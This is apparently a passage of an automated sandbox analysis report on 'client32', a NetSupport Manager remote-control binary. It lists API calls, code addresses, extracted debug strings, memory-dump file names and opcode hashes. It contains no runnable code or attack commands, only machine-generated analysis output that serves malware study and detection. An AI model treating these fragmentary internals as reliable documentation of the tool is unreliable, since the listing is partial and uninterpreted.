                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                        • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                        • API String ID: 1897251511-2352888828
                                                                                        • Opcode ID: 9b5c5f8263bc46f50a6a13551c4df91eab1ce19a36df145c4fc7c0f47d5eefed
                                                                                        • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                        • Opcode Fuzzy Hash: 9b5c5f8263bc46f50a6a13551c4df91eab1ce19a36df145c4fc7c0f47d5eefed
                                                                                        • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                        APIs
                                                                                        • OpenDesktopA.USER32 ref: 110418C9
                                                                                        • EnumDesktopWindows.USER32(00000000,Function_000416A0,?), ref: 110418E7
                                                                                        • CloseDesktop.USER32 ref: 110418EE
                                                                                        • _malloc.LIBCMT ref: 11041975
                                                                                        • _memmove.LIBCMT ref: 11041992
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001033C,00000687,00000002,00002710,?), ref: 110419CE
                                                                                        • GetLastError.KERNEL32 ref: 110419D4
                                                                                        • _free.LIBCMT ref: 110419DB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Desktop$CloseEnumErrorLastMessageOpenSendTimeoutWindows_free_malloc_memmove
                                                                                        • String ID: Default
                                                                                        • API String ID: 3929658058-753088835
                                                                                        • Opcode ID: dc0d0677379a3a6607a7d8ec950fd38cdef1e8a4373d75255f46cdd4fd172378
                                                                                        • Instruction ID: 0a4c041bdd0654e93387037eab9a5714a5cdb1d116a6a5b81f645acbf217ae6d
                                                                                        • Opcode Fuzzy Hash: dc0d0677379a3a6607a7d8ec950fd38cdef1e8a4373d75255f46cdd4fd172378
                                                                                        • Instruction Fuzzy Hash: CD716F79E0021A9FDB04DFE4C8809EEF7B9FF48304F108169E516A7244EB74BA45CB94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110513F9
                                                                                        • CloseHandle.KERNEL32(?), ref: 110514DB
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle__wcstoi64_memset
                                                                                        • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                        • API String ID: 510078033-311296318
                                                                                        • Opcode ID: 7d093bfb685be269e84acd2b1f5ae9afafa6df4d05251a5354ee2fe60ae5ef6d
                                                                                        • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                        • Opcode Fuzzy Hash: 7d093bfb685be269e84acd2b1f5ae9afafa6df4d05251a5354ee2fe60ae5ef6d
                                                                                        • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                        APIs
                                                                                        • GetOverlappedResult.KERNEL32(?,B244779C,FFFFFFFF,00000001), ref: 1100B8BC
                                                                                        • GetLastError.KERNEL32 ref: 1100B8C6
                                                                                        • GetTickCount.KERNEL32 ref: 1100B929
                                                                                        • wsprintfA.USER32 ref: 1100B966
                                                                                        • ResetEvent.KERNEL32(?), ref: 1100BA1F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                        • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                        • API String ID: 3598861413-432254317
                                                                                        • Opcode ID: 4c10284e92fc8c445f1fd1c423e0f9c9f7608b397fd9e9c7a1b4b8b2183270a2
                                                                                        • Instruction ID: 18c60078330076d4e9d4cf7e90cd241f5a56869eb84b7316cdfab9231a576d1f
                                                                                        • Opcode Fuzzy Hash: 4c10284e92fc8c445f1fd1c423e0f9c9f7608b397fd9e9c7a1b4b8b2183270a2
                                                                                        • Instruction Fuzzy Hash: 7351D1B8900A1AABE710CFA5CC84ABBF7F8EF49709F004519F56697281E7747980C7B5
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 1102965A
                                                                                        • GetTickCount.KERNEL32 ref: 1102968A
                                                                                        • GetTickCount.KERNEL32(Client,DisableStandby,00000000,00000000,0034FEA8,000000D0,B24479DC), ref: 110296C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                        • API String ID: 536389180-1339850372
                                                                                        • Opcode ID: cff2d232eac92707a3dc7571f277a3aae506fbc6ee655e5cff877dc377916b45
                                                                                        • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                        • Opcode Fuzzy Hash: cff2d232eac92707a3dc7571f277a3aae506fbc6ee655e5cff877dc377916b45
                                                                                        • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                        APIs
                                                                                        • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                        • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                        • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                        • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                        • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                          • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                          • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,B24479DC,?,00000000,00000001), ref: 110D7F8C
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        Strings
                                                                                        • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                        • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                        • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                        • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                        • API String ID: 477284662-4139260718
                                                                                        • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                        • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                        • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                        • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                                        APIs
                                                                                        • FindWindowA.USER32 ref: 1103D2E4
                                                                                        • SendMessageA.USER32(00000000,0000004A,0001033C,?), ref: 1103D313
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                        • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                        • String ID: CLTCONN.CPP$NSMW16Class
                                                                                        • API String ID: 4104200039-3790257117
                                                                                        • Opcode ID: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                        • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                        • Opcode Fuzzy Hash: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
                                                                                        • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113F116
                                                                                        • MessageBeep.USER32(00000000,?,?,?,00000000,00000000), ref: 1113F1C9
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1113F1F4
                                                                                        • UpdateWindow.USER32 ref: 1113F21B
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                        • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 490496107-2775872530
                                                                                        • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                        • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                        • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                        • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                        APIs
                                                                                        • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                          • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                          • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                          • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110417DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                        • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                        • API String ID: 2388757878-1455766584
                                                                                        • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                        • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                                        • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                        • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                                        APIs
                                                                                        • GetWindowTextLengthA.USER32 ref: 11023491
                                                                                        • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                        • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                        • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                        • ShowWindow.USER32(00000000), ref: 11023524
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                        • API String ID: 3823882759-1986719024
                                                                                        • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
